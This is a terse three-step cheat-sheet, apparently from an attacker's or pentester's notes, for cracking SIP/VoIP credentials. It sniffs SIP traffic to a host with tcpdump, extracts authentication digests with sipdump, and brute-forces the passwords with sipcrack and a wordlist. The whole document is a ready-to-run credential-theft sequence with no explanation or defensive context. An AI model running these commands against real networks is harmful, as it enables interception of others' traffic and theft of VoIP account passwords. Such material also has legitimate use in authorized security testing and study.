Dump

tcpdump -i eth0 -s0 -w sip.pcap udp and host 10.0.0.1

Get auths

sipdump -p sip.pcap sip.logins

Brute force passwd

sipcrack -w pass.txt sip.logins